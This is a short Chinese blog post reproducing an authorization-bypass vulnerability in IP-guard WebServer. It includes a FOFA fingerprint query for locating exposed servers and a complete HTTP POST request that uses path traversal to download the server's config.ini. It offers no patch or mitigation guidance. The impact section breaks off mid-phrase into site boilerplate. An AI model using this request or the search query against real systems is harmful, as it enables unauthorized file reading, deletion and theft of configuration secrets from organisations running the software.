本文主要是介绍【漏洞复现】IP-guard WebServer 权限绕过漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
IP-guard WebServer 是 IP-guard 网络安全管理系统的一部分,用于提供 Web 界面以进行用户权限管理、监控和审计。
0x02 漏洞概述
IP-guard WebServer的权限验证机制中存在设计缺陷,未授权的攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。
0x03 测绘语句
fofa: icon_hash="2030860561"0x04 漏洞复现
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
0x05 影响范围
IP-guard Web这篇关于【漏洞复现】IP-guard WebServer 权限绕过漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
